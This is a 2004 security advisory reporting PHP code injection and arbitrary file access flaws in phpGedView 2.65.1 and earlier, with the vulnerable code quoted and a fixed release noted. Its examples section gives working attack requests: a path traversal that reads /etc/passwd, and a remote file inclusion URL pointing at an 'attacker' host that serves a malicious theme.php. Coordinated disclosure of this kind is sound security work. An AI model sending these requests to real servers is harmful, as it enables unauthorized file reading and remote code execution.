<<< Date Index >>>     <<< Thread Index >>>

PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


       PHP Code Injection Vulnerabilities in phpGedView 2.65.1 and prior

################################################################################
Summary :

phpGedView is an open source system for online viewing Gedcom information
(family tree and genology information).  Multiple PHP Code Injection
vulnerabilities exist in the phpGedView product.  They enable a malicious user
to access arbitrary files or execute commands on the server.

################################################################################
Details :

Multiple PHP scripts can be exploited to perform PHP Code Injection.

Vulnerable Systems:
* phpGedView version 2.65.1 and prior

Release Date :
January 30, 2004

Severity :
HIGH

################################################################################
Examples :

                  -------------------------------------------

I - PHP Injection or arbitrary file access
(HIGH Risk BUT user must be Admin)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/editconfig_gedcom.php?gedcom_config=../../../../../../etc/passwd
or
http://[target]/[phpGedView-directory]/editconfig_gedcom.php
POSTDATA: gedcom_config=../../../../../../etc/passwd

- -- HTTP Request --

Code impacted : editconfig_gedcom.php

61:if (empty($gedcom_config)) {
62:        if (!empty($_POST["gedcom_config"])) $gedcom_config = 
$_POST["gedcom_config"];
63:     else $gedcom_config = "config_gedcom.php";
64:}
65:
66:require($gedcom_config);

The both GET/POST requets will work evenif PHP register_globals is Off.

                  -------------------------------------------

II - PHP Injection
(HIGH Risk no authentication needed)

- -- HTTP Request --

http://[target]/[phpGedView-directory]/index/[GED_File]_conf.php?PGV_BASE_DIRECTORY=http://attacker&THEME_DIR=/

- -- HTTP Request --

Code impacted : [GED_File]_conf.php

123:if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) 
require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");
124:else {
125:        $THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";
126:        require($THEME_DIR."theme.php");
127:     }

The require call is only vulnerable when PHP register_globals is On.

In this case you have to obtain the name of the GEDCOM File used.  Just perform
a http://[target]/session.php request the GEDCOM file will be in argument of the
login.php call.

The attacker has to create on his web site a directory call themes/standard, and
a file theme.php

For example: theme.php = <?php print "<?php phpinfo();?>" ;?>

and the request, will execute the phpinfo() command on the vulnerable target.


################################################################################
Vendor Status :

The information has been provided to John Finlay the PhpGedView Project Manager.
A new release 2.65.2 with fixes for these vulnerabilities is available.
- --> http://phpgedview.sourceforge.net/
- --> 
http://sourceforge.net/project/showfiles.php?group_id=55456&package_id=61562&release_id=141517

################################################################################
Credit :

Cedric Cochin, Security Engineer, netVigilance, inc.
< cco@xxxxxxxxxxxxxxxx >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQFAGZbZA9/8vqmWoYQRAmVrAJ9rd9L6WkO5FV9ufaMYj5mhk0uMXwCePwxS
+hdjG8/IGk+yoZje7W1I110=
=Gfdz
-----END PGP SIGNATURE-----